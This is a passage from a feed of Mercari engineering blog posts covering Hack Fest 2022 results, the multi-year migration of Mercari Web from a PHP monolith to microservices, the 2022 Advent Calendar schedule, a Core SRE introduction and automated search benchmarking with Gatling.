Imagine a team of engineers that have adopted a knowledge management practice to ensure they are sharing well-documented and up-to-date knowledge with each other. Sounds like a collaborative, asynchronous way to make sure everyone’s on the same page, right?

Now, imagine cross-functional teams across multiple divisions that have adopted a consistent knowledge management practice. In this scenario, everyone benefits from knowing exactly where to find the knowledge they need to be quick and efficient in their work.

As with PKM, capturing knowledge effectively requires not only a systematic approach but also the right knowledge management software for your use case. Confluence is a popular solution because of its robust features and capabilities. For an internal or external helpdesk, you might prefer a solution like ServiceNow.

Closing thoughts

At Mercari, we have many engineers who regularly contribute to documentation by sharing knowledge, which benefits not only them but also others throughout the company. Taking this people-centric approach to documentation promotes knowledge sharing and fosters a healthy learning environment.

By capturing knowledge and sharing complex concepts, we can spend less time searching for and relearning knowledge. Instead, we can use that time to work on products and features that delight our users.

Day 5 of the 2022 Mercari Advent Calendar will be written by @afroscript, who is also from the Engineering Office team. Be sure to check it out!

Mercari Hack Fest : Unlimited Hacktivity – The Result!

Thu, 01 Dec 2022 11:00:59 GMT

Hello everyone, this is Yoza from the Engineering Office. This post is for Day 1 of Mercari Advent Calendar 2022 .

As I shared in a previous blog, Mercari holds a regular Technology festival where Mercari Employees are able to devote time to creating their own “Innovations”. The most recent event was successfully held on November 9-11. In this blog, I am going to share with you the result of the Autumn 2022 Mercari Hack Fest.

Previous article : Mercari Hack Fest 2022 UNLIMITED HACKTIVITY TO UNLOCK HIDDEN POTENTIALS

Similar to the previous one, Hack Fest Autumn 2022 was held as a hybrid event. We designed the event to be completely hybrid where participants were given options to showcase the fruits of their project at the office or in a place of their own choice. This is lined with our new normal workstyle “Your Choice”

During the three day event, we received 96 innovative ideas in the idea board. 26 of them were able to present the results and 274 audiences gathered to watch their presentation.

SHOWCASE DAY!

Showcase Day was the time where project teams could present their work to the panel of judges. In this hack fest, the participants could choose presentation slots of 4 minutes with 2 minutes of Q&A time or 1 minute with no Q&A time.

After many compelling demos on Showcase Day, it was up to the judges to determine who were the best of the best. They were very impressed by all of the projects they saw, but it came down to the following results.

Here are the winners of the Autumn 2022 HACK FEST!

GOLD AWARD

The first place went to @otao with the project named “ Don’t let me choose: Auto-fill the best shipping method by light detection and ranging.

Project details: “Choosing a shipping method is extremely difficult for sellers, especially if it is the first time. It would be a significant cause of leaving our app. This project aims to provide an auto-fill feature for the best shipping method by light detection and ranging. Customers no longer have to worry about shipping methods.”

SILVER AWARD

The second place went to @rozenmoon with the project named “Better Shipping UX”

Project details : Make it easier for Seller to Ship the item

Judge’s comment

BRONZE AWARD

This time, because of many interesting and innovative projects, it was not easy for the judges to decide a single Bronze Award winner. After careful consideration and debate, they decided to give two Bronze awards. The first bronze award was given to a project named “Photo Description Markup” by @osari.k and @oscar. The second bronze award was given to Save Money and Reduce Dependency on External Tools by @roger, @saatvik @execjosh @dom @arjun.hemjani

Bonze 1

Project Name : Photo Description Markup

Project detail : Both listers and buyers want to explain and understand the item’s detail. Photo is a good way. This project aims to provide a new way for listers to write a description for a specific photo, and make it easier for buyers to see the description.

Judge’s comment

Bronze 2

Project Name : Save Money and Reduce Dependency on External Tools

Project Detail : Set out to reduce our dependency on external tools

Judge’s comment

Beyond the three main awards explained above, there were several more interesting projects who were not included in the three winner categories but were regarded enough to earn honorable mentions.. A new category called the “Hack Fest Spirit Award” was created and awarded to the project“Groundup for Customer UX” by @kuu, @Hamaちゃん, @Jun-wang and Debug Crash Helper Project by @araki_atsushi, @codechaitu, @Phuong

Closing message from CTO

“Thank you very much for attending this event. It has been a year since we had the last event but going forward we want to have this kind of event more frequently. We were very much impressed and overwhelmed by the creativity, insight and passion of the presenters. I’d like to thank everyone who is involved and makes this event great“ by @kwakasa

Congratulations to all the winners!

Mercari Hack Fest has proven that great innovation and engagement can be made in such a short period if we have the will to do it. It also showed that location isn’t an obstacle as we saw projects from both on & off site teams.

Thank you for reading through this article and we will see you soon with more exciting information!

Tomorrow’s article for the 2nd day of Mercari Advent Calendar will be by presented by yasu_shiwaku also from the Engineering Office team. Please look forward to it!

The Four-Year history to migrate Mercari Web to Microservices

Fri, 25 Nov 2022 14:00:56 GMT

*This article is a translation of the Japanese article published on August 30th, 2022.

Author: @urahiroshi, Engineering manager of Web Platform team

On August 4, 2022, a server called "web-2" was shut down at Mercari. This was the end of an era for those teams involved in developing Mercari Web.
The web-2 server was a web server written in PHP, and it had been serving content under https://www.mercari.com/jp/ since 2015. Several web microservices are now responsible for its functionality, and pages under https://www.mercari.com/jp/ are redirected to pages served by these.

The process of migrating Mercari Web to microservices and finally shutting down web-2 actually took over four years to accomplish. In this article, we are going to cover what the development teams discussed over these four years, describe our architectural design choices, and consider what kind of organization and architecture can best handle change. I hope you’ll find some useful information here!

Launch of the Web Re-Architecture project (from May 2018)

We launched the project to overhaul the architecture of Mercari Web in 2018.
All Mercari Web content was served from the web-2 server at that time. Back when web-2 development first began, there were a lot of team members with plenty of experience in PHP, and we were using an internally supported PHP framework called Dietcube (https://github.com/mercari/dietcube) to write an efficient server-side implementation. However, we began to notice some issues as time went on.

From the very start of development, we were seeing more need for interactive behavior (such as updating screens based on operation), and we began hiring more team members specialized in JavaScript and other web frontend technologies as our organization grew. There was a growing desire to write the core logic in JavaScript and reduce our dependence on PHP.
As the number of functions provided by web-2 increased, so did code and deployment complexity. This meant higher development costs to make changes, and more issues occurring after release.

Mercari Web: May 2018
(We were also using CDNs, proxy servers, and databases, but I’ve omitted them here)

In order to solve these issues, we launched the Web Re-Architecture project in May 2018. Our goals were to overhaul the codebase and architecture to make Mercari Web easier to maintain, and to use the latest web frontend technologies to increase page rendering performance.

We also started a plan to migrate the API servers into microservices during the same year. A decision was reached to replace our monolithic API servers (written in PHP) with Go microservices running on a Kubernetes infrastructure.
The infrastructure and deployment processes for web-2 were originally managed by the SRE Team. But after the decision was made to migrate Mercari Web from a monolith to various microservices, the Web Team, under the Web Re-Architecture project, assumed responsibility for designing and operating the new web infrastructure.

This is how we began considering which technologies to use and which microservices to provide. The microservices created during the Re-Architecture project are listed below, along with brief descriptions of how they came to be.

web-fuji: Provides server-side rendering (SSR)

We decided to use SSR from an SEO perspective, to support OGP, and to improve page rendering performance. Specifically we chose Next.js (https://nextjs.org/) for our framework.
We decided to name the future Mercari Web microservices after mountains, so we named this service web-fuji, after Mount Fuji. Unfortunately, we never named any other services after mountains!

web-graphql: Provides web APIs

The web-2 server also provided endpoints for calling APIs. This functionality is called backend for frontend (BFF). We decided to use GraphQL as the protocol for providing this BFF functionality, and selected Apollo Server (https://www.apollographql.com/docs/apollo-server/) as our framework.

web-gateway: Performs routing for web microservices

We planned to launch Web Re-Architecture releases gradually for each page, and so created the web-gateway microservice in order to perform routing between Mercari Web microservices. By controlling routing for canary releases, we could gradually switch requests between web-2 and Mercari Web microservices.
We were using NGINX as a load balancer for web-2 routing, and so we decided to use ingress-nginx (https://kubernetes.github.io/ingress-nginx/) because it would make it easier to migrate NGINX logic. It also provides cookie-based session affinity and canary release functionality.

web-session: Retrieves and updates session information

The web-2 server stored user session information associated with session IDs from cookies in a database. These session IDs were converted into access tokens prior to calling APIs. As web-gateway gradually switched routing between web-2 and Mercari Web microservices, we needed to synchronize web-2 session information during the migration period. We expected that this would become pretty complicated, so we decided to create a microservice dedicated to retrieving and updating session information.
For the web-session tech stack, we chose Node.js to reuse as much of the same technology as possible between Mercari Web microservices, and also decided on a plan of using gRPC as our communication protocol between microservices, since it was being recommended within Mercari (we ended up changing this, which I’ll cover later). Also, we chose Cloud Spanner as our database for storing session information.

Our Web Re-Architecture plan was presented during the 2018 Mercari Tech Conference. You can also see information on re-architecture goals and architecture from this presentation.
https://speakerdeck.com/mercari/mtc2018-web-application-as-a-microservice

Release of web microservices (from June 2019)

Our first goal was to serve just the front page from the new architecture as soon as possible. However, we ran into several problems and fell behind our release schedule.

Underestimation of the new technology:
Even though we were only releasing the front page, we needed to finish a lot of tasks including building infrastructures for each microservice and a CI/CD platform. Many technologies were brand new for the Web Team, and we underestimated how long it would take to become proficient.
Reworking due to changes in underlying technology:
When we were selecting technologies to be used for web-session, we had planned on implementing the gRPC server in Node.js. However, gRPC wasn’t fully supported by the Node.js ecosystem at that time, so we decided to use Go to implement our gRPC server instead. We had assumed that we would use gRPC itself at this time, but there were some issues with implementing gRPC clients from Node.js. We finally decided to use REST APIs instead of gRPC.
Schedule delays due to service dependencies:
web-session’s functionality was required to call microservice APIs from web-fuji and web-graphql., Delays in web-session blocked development of web-fuji and web-graphql, which further delayed development overall.
Changes to development processes:
At the same time, Mercari introduced scrum and design docs as part of the development workflow. It took the Web Team some trial and error to effectively learn these techniques.

The first release finally became possible in June 2019, or roughly one year since development began. We first released web-gateway. Although it merely proxied requests to web-2 at this time, we decided to release it first so that we could control routing destinations as we released other web microservices.

Mercari Web: June 2019
Web-gateway added in order to relay requests

In order to release other services, we used the canary release functionality of web-gateway to gradually switch front page traffic from web-2 to web-fuji from 0% (access allowed only to internal users) to 1%, 5%, 10%, and so on, and finally were able to switch 100% of requests to web-fuji in August.

Mercari Web: August 2019
Front page now distributed from web-fuji and web-graphql

I posted an article in the past (Japanese only) that provides more details on how web-fuji and web-graphql were released after the architecture change and describes web-gateway functionality, so feel free to check it out if you’re interested in learning more.

After releasing the front page, we began gradually switching other pages to web-fuji. There were some concerns that web-fuji and web-graphql would themselves become new monoliths, so we began considering how to decouple services.
While all of this was happening, we arrived at a turning point in December 2019.

Launch of the GroundUp Web project (from December 2019)

In December 2019, everyone on the Web Team met to discuss a new plan. This was called the GroundUp Web project, and its goal was to completely redesign and reimplement Mercari Web. This turned into a discussion on why we needed to redesign and reimplement Mercari Web, only four months after the release of Web Re-Architecture.

There were several reasons for the launch of the GroundUp Web project.

Overhaul the user interface:
The plan for the Web Re-Architecture project was to replace the architecture and implementation, without changing the existing user interface. However, due to the growing number of mobile users, we decided to improve the user experience by overhauling the design and providing a layout better suited for mobile browsers. These were the goals of the GroundUp Web project.
Simultaneously release core functionality instead of releasing page-by-page:
The Re-Architecture project was released on a page-by-page basis, and therefore required release work to be performed for each page. We also needed to consider compatibility between old and new pages when migrating, and they required more for migration. Also, we wanted to overhaul the user interface and release core functionality all together for the C2C marketplace.
Implement architecture that allows the Web Frontend Team to have the same responsibilities as the Android and iOS Teams:
Mercari Web application was missing some features compared to the Android and iOS application, and we wanted to add them. If we wanted to implement a certain feature on all apps, the plan for the Android and iOS apps were that first the Backend Team would implement the required APIs, and then client code would be implemented. For the web app however, we would also need to design and implement GraphQL APIs and consider server-side rendering processes. These development procedures and responsibilities were different from those of the Android and iOS Team , and were bottlenecks in implementing features on all apps simultaneously. The aim here was to change the architecture so that we would have the same responsibilities as the Android Team and iOS Team, allowing for new features to be provided faster.

Of course, we also considered taking an approach that would have resolved this issue using the existing Web Re-Architecture project architecture. However, we wanted to design architecture without being restricted by existing architecture.

Some of the decisions made for the GroundUp Web project architecture are described below.

Use web components to overhaul the Design System

During the Web Re-Architecture project, we used our in-house Design System library for the UI component. The Design System library was originally written based on React, but we decided to rewrite the system using web components that don’t rely on any particular framework so that it could be more widely used throughout Mercari Group. We decided to use the system for the GroundUp Web project as well. More details on our Design System can be found here: https://engineering.mercari.com/blog/entry/20210823-8128e0d987/ (Japanese Only).

Use static site generation (SSG) and dynamic rendering (web-suruga microservice)

We decided to design the architecture based on static site generation (SSG) and selected Gatsby (https://www.gatsbyjs.com/) as our SSG framework. We did this for two reasons. First, using web components would make SSR difficult. Second, we wanted to reduce the amount of development work that would occur due to the introduction of SSR, and have the same development procedures to iOS and Android development teams.
Files generated by SSG do not contain any content from API call results and this would be an SEO risk, so we used an architecture called “dynamic rendering” in addition to SSG. More specifically, we installed a server running Rendertron (https://github.com/GoogleChrome/rendertron) called Prerender, which would run JavaScript processes on Mercari Web instead of a Google crawler, and return dynamically generated HTML to crawlers.
The microservice providing GroundUp Web was named "web-suruga." This was named after Suruga Bay, which looks out over Mount Fuji, which was the inspiration for naming web-fuji from the Web Re-Architecture project.

Create the new web-auth microservice

We decided to create a new microservice called web-auth to implement login and registration, rather than implementing this functionality on web-suruga.
The intention was to be able to use the login and registration screens from web services other than Mercari Web, and we thought it would be better from an ownership perspective to split this microservice from web-suruga (which provides Mercari Web).
We were planning to implement an architecture to return HTML contents from Google Cloud Storage (GCS) for web-suruga. However, login and registration functionality had some situations to receive callback requests after authentication using Google, Facebook, and Apple accounts. It was difficult to support these needs by returning static files from GCS, so web-auth required a different architecture, returning response from a Go server.

Eliminate web-graphql and web-session

We also revised session management and API calling. Instead of going through a GraphQL API, we wanted to call the APIs provided by the Backend Team directly from the Web client, just like with the Android and iOS applications.
We initially intended to avoid storing access tokens directly in the browser, out of concern for security. To that end, we opted to store session information including access tokens in JWT format to HttpOnly cookies. However, eventually we switched gears to use access tokens with sufficiently short lifetimes and store them in the browser’s Local Storage, and make use of session IDs saved as HttpOnly cookies only when reissuing access tokens.
Access tokens would be saved on the browser, and the same microservice used by the iOS and Android applications could be used to reissue tokens, so Web Team doesn’t need to manage the web-session microservice.

When we were considering web microservice responsibilities, we decided not to split off microservices unless there was a clear reason for doing so. A browser downloads JavaScript or other files required for the web page to function. If content is distributed from different microservices for different URLs, changing a service will also change these required files, which will reduce cache efficiency. Splitting services up too much can therefore have a negative effect on the user experience. This is why we decided to allow web-suruga microservice to have many responsibilities, and splitting services up only when required.

To develop new microservices we looked back on our development experiences during the Web Re-Architecture project, and decided to provide a BFF for development that can easily call APIs until session management and API calling could be properly implemented. This made it easier to build the frontend. We were also able to take what we learned during the Web Re-Architecture project and apply it toward tasks such as configuring CI/CD, implementing end-to-end testing, and building an infrastructure on Kubernetes.

We continued to add functionality to web-2 and web-fuji in parallel for a while, but ended up halting this and instead worked with all of the Mercari Web development teams on implementing the GroundUp Web project.

We were finally prepared for release after a development period of around one year. We had been using URLs under https://www.mercari.com/jp/ for Mercari Web, but were also using https://www.mercari.com for Mercari US. We wanted to maintain separate Japan and US sites, and so we decided to switch to the https://jp.mercari.com domain after releasing GroundUp Web.
We came up with the following plan for launching gradual releases.

Open https://jp.mercari.com only to Mercari employees, and gather feedback, it was called “Internal Release”.
Opt-in a certain percentage of users to be redirected from https://www.mercari.com/jp/ to https://jp.mercari.com, it was called “Limited Release”
Redirect all requests to pages under https://www.mercari.com/jp/ to https://jp.mercari.com, it was called ”Full Release”

We were able to launch the Limited Release in March 2021, but had to temporarily stop development in order to join a companywide response to a security incident in which an attacker gained unauthorized access to Codecov (https://about.mercari.com/press/news/articles/20210521_incident_report/ (Japanese only)).
Once we were able to resume development, we began designing and implementing redirection for the Limited Release and Full Release. Until this point, web-2 and web-fuji were processing requests for each path under https://www.mercari.com/jp/, so we implemented redirection on both web-2 and web-fuji.
Once this was finished, we launched the Limited Release without issue on August 5, gradually increased the redirect ratio, and then launched the Full Release on September 29.

Mercari Web: September 2021
GroundUp Web released, web-suruga and web-auth content distributed from the jp.mercari.com domain

In this article, I’ve focused mainly on the roles of each web microservice. If you’d like to learn more about the web-suruga microservice, which played a central role in the GroundUp Web project, details on the architecture and development organization can be found in the following article: https://engineering.mercari.com/en/blog/entry/20210810-the-new-mercari-web/

The web-2 Sunset project (from September 2021)

Although we didn’t have any issues launching the Full Release of GroundUp Web, not all of the pages under https://www.mercari.com/jp/ were being redirected to https://jp.mercari.com, as there were still some pages being served by web-2. The services created during the Web Re-Architecture project (web-fuji, web-graphql, and web-session) were also still running to provide redirection. Our next goal was to completely eliminate the service infrastructure for web-2, web-fuji, web-graphql, and web-session, because we would otherwise have to continue to maintain them and implement security measures, even if most of their functionality wasn’t being used. We called this the web-2 Sunset project.

We started working on eliminating the services that were just providing redirection (web-fuji, web-graphql, and web-session). Although redirection itself is required, there was no need to maintain an infrastructure for these services. We had provided redirection with keeping login status of users who had already logged in the old domain for one month after the release of GroundUp Web, and it required complex functionality to refer cookies and issue access tokens but we could eliminate this functionality. So it would be sufficient just to map URLs under https://www.mercari.com/jp/ to URLs under https://jp.mercari.com.
In November 2021, we provided a microservice called web-redirection (used only for redirection), and were able to remove the infrastructure for web-fuji, web-graphql, and web-session.
We implemented web-redirection using Cloud Functions, because we wanted to reduce the amount of work to maintain the service, and because we wanted to provide the implementation with some flexibility.

Mercari Web: November 2021
Redirection provided by the web-redirection service, allowing the web-fuji and web-graphql services to be eliminated

Our next task was to determine how to migrate remaining pages served by web-2. The remaining pages could be classified as follows.

Terms of services, privacy policies, and other legal documents for each service
Landing pages for promotions and certain services
Pages providing users with instructions on using Mercari (these pages are also called as “Mercari Guide”)
Pages that launch the Android or the iOS app through universal links, etc.

Of these, web-2 provided CMS functionality for Mercari Guide and Mercari Guide is independent from Mercari Web app, so there was already a plan in place to launch a new help-center microservice and migrate the existing pages.
As for the other pages including terms of services and privacy policies, and landing pages for promotions, there was no need to call APIs, and so these pages could be provided using static files such as HTML. We decided to create a new microservice called web-static-page and migrate these pages to it.
That leaves us with the pages that launch the Android App or iOS App through universal links. These functionality can be provided by redirection, so we decided to implement them on the web-redirection service.
Using a common domain between multiple microservices causes some potential issues, such as Local Storage or cookie information being shared unintentionally. We therefore decided to serve content on different domains if the microservice is different.

The teams with ownership of these services worked on these development projects in parallel, and were able to migrate their pages on the following schedule.

April 2022: Released the help.jp.mercari.com domain and the corresponding help-center microservice, and redirected corresponding pages under https://www.mercari.com/jp/
May 2022: Released the static.jp.mercari.com domain and the corresponding web-static-page microservice, and redirected corresponding pages under https://www.mercari.com/jp/
June 2022: Switched over all redirection features on web-2 to the web-redirection service

As of June 2022, all requests under https://www.mercari.com/jp/ were being redirected, and there was no longer any traffic to web-2. The infrastructure for web-2 had been completely eliminated as of August 4. Finally, after more than four years of work, our conversion of Mercari Web into microservices was complete.

Mercari Web: June 2022
Appropriate microservices process requests for each type of content

Conclusion

Our architecture has continued to change to support the needs from application and organization, and to suit whatever technology we can use. The microservices we’ve developed over the last four years will also continue to be changed.
As of the writing of this article, the Web Team is planning to make the following architecture changes.

Migrate from dynamic rendering to SSR:
We’ve noticed that costs have increased due to the CPU load on the dynamic rendering server and that response delays have had an effect on SEO, so we’d like to switch over to SSR.
Separate the domain of the pages provided by web-auth from https://jp.mercari.com:
We want to ensure independence from web-suruga and make network routing easier.

As for the first change, we actually had some concerns over performance when initially designing the architecture, and had conducted a load test prior to deciding to use dynamic rendering. However, the application itself hadn’t been completed when we conducted the load test, and so we instead performed rendering using test content. Our results ended up being quite different from those of the final application. We first realized that the load would be a problem immediately prior to release, but it wouldn’t have been possible to migrate to SSR at that point. We decided to investigate the issue later, since this dynamic rendering feature wouldn’t have any impact on users.
On the other hand, this change wouldn’t impact any other microservices, since web-suruga was the only microservice using dynamic rendering. I guess this shows the benefits of a microservices architecture!

When I reflect back on these four years of architecture changes and development work, I see a lot of areas we were able to improve. This isn’t meant to place any blame or criticize any work! Instead, it’s better to look back on the purposes, development processes, and results of changes we made, and reflect what we’ve learned for future changes. I think that’s how you build a stronger organization. I hope this article will be of some help for it.

Finally, I’d like to thank everyone who contributed to the web-2, and also everyone involved in the Web Re-Architecture project, GroundUp Web project, and web-2 Sunset project. I really appreciate all of your work building the basis for Mercari Web and your efforts during each project to make Mercari Web what it is today. Thank you very much!

If you are interested in joining the projects like these at Mercari, please take a look at our career page.

Mercari Advent Calendar 2022 is coming up!

Thu, 24 Nov 2022 11:30:41 GMT

Hello! I’m @yasu_shiwaku from the Engineering Office.
We have our annual Advent Calendar event in December every year and we’ll be hosting it again this year!

We have both Mercari and Merpay Advent Calendar at the same time, so please check out Merpay side as well.

▶Merpay Advent Calendar 2022

Also our engineering team at Souzoh (Mercari Shops) is running an Advent Calendar project a bit ahead from November. Please check it out if interested!

▶Mercari Shops Flying Advent Calendar2022 (Japanese only)

What is the Advent Calendar?

We’ll be sharing our knowledge of the technologies used by our engineers at Mercari group. We hope this Advent Calendar will help you to enjoy the days leading up to Christmas.

Past Advent Calendar

Open Calendar

This is a collection of links to each article. I recommend bookmarking this page to for the prompt update, and it will be very useful if you want to check it out at a later date.

Date	Theme / Title	Author
12/1	Mercari Hack Fest : Unlimited Hacktivity – The Result!	@Yoza
12/2	数字で振り返るMercari Engineering Blogの1年間	@yasu_shiwaku
12/3	未知の脅威に対抗するメルカリのCI再設計	@michaelf
12/4	Capturing and applying knowledge through a personal knowledge management practice	@josh
12/5	組織内コミュニケーションにはどのようなものがあるのか分類してみた	@afroscript
12/6	FinOpsへの取組エンジニア組織の意識を変えた「データストーリーテリングに基づいたコスト可視化」	@bungo
12/7	FinOpsへの取組地道な計数管理とデータ加工の日々	@bungo
12/8	Web Design System: Migrating Web Components To React	@wills, faisal
12/9	The importance of role definition in an engineering organization	@stouf
12/10	My journey from an SWE Intern at Mercari JP to SWE at Mercari India	@vaibhav.jain
12/11	Ten Tips to Improve Your Technical Writing	@rey
12/12	メルカリにおけるA/Bテスト分析自動化の取り組み	@yaginuuun
12/13	Seamless critical traffic migration with CoreDNS request rewrite feature	@raphael
12/14	Exploring the possibility of Istio Ingress Gateway	@hatappi
12/15	DevStats – メルカリグループの各種指標計測について	@masartz
12/16	Do We Need Engineers in a ChatGPT World?	@darren
12/17	Mercari India : The story of Mercari Group’s first ever Global Center of Excellence	@mohan.bhatkar
12/18	Moving to cloud: How to do Migrations the wrong way	@kaustubh
12/19	What is Data Reliability Engineering	@US DRE(Dan M.L., Xi Zhou, hatone)
12/20	Optimizing React Re-Renders for Improved Performance	@sahil505
12/21	私たちはKubernetes SchedulerにWasm拡張の夢を見るか	@sanposhiho
12/22	Droidkaigiスポンサーブース運営の裏側と振り返り2022版	@kuu
12/23	Showcasing “DevDojo,” a Series of Mercari-Developed Learning Content for Engineering	@aisaka
12/24	Customer Inquiry Routing Algorithm	@prashant
—	Working in a cross functional team	@deepak
12/25	Look back of Mercari Engineering 2022	@Engineering Board members

Please bookmark this article and check it out when you want to read it or follow the official Mercari Developers Twitter @MercariDev so you can be aware of article publication notifications!

We’re looking forward to bringing you some interesting technology stories in the last month of 2022! I hope you’re looking forward to the Advent Calendar!

Introduction of CoreSRE

Fri, 28 Oct 2022 12:00:00 GMT

This article is a translation of the Japanese article published on February 25th, 2022.

Note: This article is part of our "Blog Series to Introduction of Developer Productivity Engineering at Mercari."

Introduction

Hello! This is Hidenori Suzuki, the Engineering Manager at Mercari Core SRE Team.
Core SRE is one of the teams in the Developer Productivity Engineering Camp, and our goal is to resolve issues with large MySQL databases and subsystems used by monolithic APIs.
In this article, I cover two of the projects we’re currently working on.

Overhauling large MySQL databases

Mercari services had previously been structured from monolithic applications written in PHP. We decided to gradually convert each feature into its own microservice, in order to help expand the engineering organization and improve the speed at which services are developed. The intention was to split large MySQL databases being used by these monolithic APIs.

However, services continued to grow at a rapid pace, and the amount of data became massive. We then decided to migrate to a system with a scalable structure.

This project has just begun, and we’re now considering several options from multiple angles to determine whether they can meet our requirements.
I plan to cover these efforts in a little more detail as a blog post in this series of articles.

Relocating systems

When the Mercari service first launched, it was located in a data center in Ishikari, Hokkaido. (The background is introduced in a past blog article.)

We then reconfigured the system so that our monolithic API and databases would be located in Tokyo alongside our microservices in GCP’s Tokyo region.
Some of the subsystems used by the monolithic API were made obsolete by replacing their features with managed services provided by GCP. As for the rest, it was assumed that many of them could eventually be decommissioned as we modernized our design, so initially we left those subsystems in the data center in Ishikari.

However, later we decided to relocate our subsystems to the GCP Tokyo region, in order to reduce management/operation costs and to reap the benefits of connecting them with internal systems located in GCP.

Rebuilding the Ishikari subsystems in Tokyo may seem like a simple task, but in reality it requires some careful thought. When working with a legacy system, we must keep in mind the possibility that it was designed in a way that prevents sufficient information from being shared within the team.

Over the course of this project, we will be analyzing these systems, making necessary improvements, and working toward improving service quality and reliability (while doing our best to avoid any service degradation as we rebuild).

Conclusion

I’ll be posting more about what the Core SRE Team is doing, so please be sure to check it out.

Mercari, Inc. is hiring! Are you passionate about making improvements? We’d like to meet with you.

https://careers.mercari.com/job-categories/engineering/

We’re also happy to conduct a casual interview if you just want to know more.
We can talk about more details that I wasn’t able to include here, and I’m happy to answer any other questions you might have.
If interested, please feel free to contact me on LinkedIn to schedule a casual meetup.

Benchmarking Automation to Maintain Search Response Performance

Wed, 26 Oct 2022 16:30:18 GMT

*This article is a translation of the Japanese article published on February 8th, 2022.

Note: This article is part of our "Blog Series: Introduction to Developer Productivity Engineering at Mercari."

Introduction

Hello. This is Yoshinobu Fujimoto (@jimo1001) from the Mercari Microservices SRE Team.

I’m an Embedded SRE in the Search Infrastructure Team, which provides microservices related to searching at Mercari JP. I’m currently working on improving service reliability and automating infrastructure-related tasks. In this article, I’ll be covering benchmarking automation, which is used to maintain product search response performance at Mercari.

Search platform architecture

I’ll begin with a simple overview of our search platform architecture. The simplified diagram below shows only the major components.

The roles of each of these components are described below.

Elasticsearch Cluster

At Mercari, we use Elasticsearch to implement our search feature. To provide the best search experience to our users, we create Elasticsearch clusters and indexes which are optimized based on search content and search conditions.

(Search) Middleware

The Middleware provides gRPC endpoints for connection with Elasticsearch and are connected to each Elasticsearch cluster. In addition to returning Elasticsearch results, these components perform a wide variety of generic processes related to searching (such as re-ranking), so I refer to them as "search middleware."

Load Balancer

This component performs load balancing on requests sent to search middleware, and it performs middleware routing associated with each Elasticsearch cluster. We also use this to control traffic when Elasticsearch clusters are rebuilt, or when a canary releases are made.

Adapter (BFF)

This system is responsible for backend for frontend (BFF), and processes multiple Elasticsearch results along with request results from other microservices.

For our current benchmarking automation project, we’re focusing on the search middleware and Elasticsearch clusters. These components are closely linked together and are directly linked with search response performance, so we need to evaluate performance carefully.

Benchmarking Automation

The goal of benchmarking automation is to detect performance degradation before it happens, or immediately afterwards. The main factors for performance degradation that we watch for are as follows:

Reconfiguring Elasticsearch (such as changing the index schema or upgrading Elasticsearch to the latest version)
Changing/adding search middleware functionality
Changes to product search trends among users

This work also involves automating load tests which are conducted each time a release is made. Therefore another goal for us is to reduce the time and resources spent on these load tests.

In order to accomplish this, we need to continuously…

Run automated benchmarking regularly
Run automated benchmarking triggered by CI/CD execution of software development

… and also pay attention to any changes in benchmark results.

Benchmark results are compared with other results to determine whether performance has improved or worsened, it is therefore important that we execute the benchmarks in a consistent environment:

Using the same machine resources (such as CPU and memory) for benchmark client nodes and benchmark target nodes
Using the same benchmark conditions (such as requests per second, number of parallel executions, and execution time)

When running a benchmark, having too many machine resources free can actually be a detriment, as this can easily hide performance degradation. It’s important to adjust machine resources and benchmark conditions so that anywhere from 80% to 100% of resources are being utilized when the load is at its peak when benchmarking.

Platform for running benchmarking automation

The diagram above shows the platform we’ve built to run benchmarking automation.

The core of this platform is the Benchmarker, a component that runs benchmarking, provides results notification, and connects with external services. This component exists in a VM instance on GCP, and we adjust kernel parameters and ulimit resource limits to ensure that benchmarking can run reliably.

Benchmark execution triggers

In order to discover problems quickly and determine why they are occurring, and get to the bottom of what is going on. It’s important, then, to provide means that can be run benchmarks in many situations. We currently have two methods of running benchmarks, but it’s still not enough. We plan to add more.

Run benchmarks periodically using CronJob

We use CronJob to run periodic benchmarks. This is run at specific times on each day, and results are provided to Slack.

Run benchmarks using a Slack bot

We can also run a benchmark at any time from Slack.

Automatic deployment using Spinnaker

In order to run benchmark testing on any given version of the search middleware, we use Spinnaker to deploy a specified version ahead of time, and then run testing when the service is started.

Benchmark testing using Gatling

We use a load testing tool called Gatling to request search queries in parallel to the search middleware, and to measure response times and status. Gatling is capable of generating extremely rich HTML reports. These are saved in cloud storage, so that we can check them along with result summaries from Slack benchmark result notifications.

The search queries that are used for testing are downloaded from query logs saved in BigQuery, which have been extracted and exported to cloud storage during the benchmark.

Future plans

This is all currently under development and there’s still a lot more to accomplish. We hope to connect with various services, enhance test result visualization, and make the platform easier to use.

Calculate benchmark scores

We currently provide notification of Gatling raw test results, which makes it difficult to determine at a glance if performance has increased or decreased. If we could calculate and present benchmark scores that accurately reflect test results, it would make it easier for people to understand what they are seeing, and would also make it easier to monitor by machines.

Connect to Datadog

The metrics generated from the benchmarking platform are registered to Datadog. If we could show benchmark testing trends and results on the same dashboard along with metrics such as CPU utilization, error rate, and latency, we could conduct closer analysis, and could also make it easier to identify why a particular problem is occurring.

Connect to GitHub

If we could run benchmark testing and check results from GitHub pull requests, then we could instantly check for performance dips during development, which would make it even easier to develop services.

Conclusion

In this article, we covered some of our work with benchmarking automation involving benchmark testing conducted regularly and automatically, with the goal of being able to quickly detect drops in response performance.

We are currently working to implement a lot of features, and we still have a lot of work to do with regard to measuring effectiveness. I plan on posting again once we’ve made some more progress.

MERCARI HACK FEST 2022 : UNLIMITED HACKTIVITY TO UNLOCK HIDDEN POTENTIALS #MercariHackFest

Mon, 24 Oct 2022 21:17:33 GMT

Hello everyone! My name is Yoza from the Engineering Office! I am here to share some good news with you!!

⭐MERCARI HACK FEST IS COMING!⭐

Some readers may be wondering “what Mercari Hack Fest is about?”, or some others may already know that Mercari is regularly hosting a technology festival similar to Hackathon. This is the 6th time that Mercari organizes the event and we always have some interesting updates in each event! This article briefly introduces “what’s new” in the upcoming Hack Fest that will take place from November 9-11.

You can check one of previous events HERE

What is Mercari HACK FEST? 🤔

Mercari Hack-Fest is a semi-annual internal technology festival. During the three-day event, people can freely develop new products or do new projects other than what they do in their daily routines, improve on existing tools, or even create their own innovations.People can participate in the event as a team or as an individual contributor.
This is the event where many talented people across Mercari organizations can show off their technology skills and make something impactful that aligns with the Mercari value : GO BOLD, ALL FOR ONE, BE A PRO.

In previous events, we have seen our highly talented engineers come up with excellent projects that made great contributions to our products. We hope that many people will take part in this festival and make some magic happen!

New Event Name　 ✨

We used to call the event Hack Week until last year. Some of you who are familiar with the previous event, Hack Week may notice the change in the event name and duration.

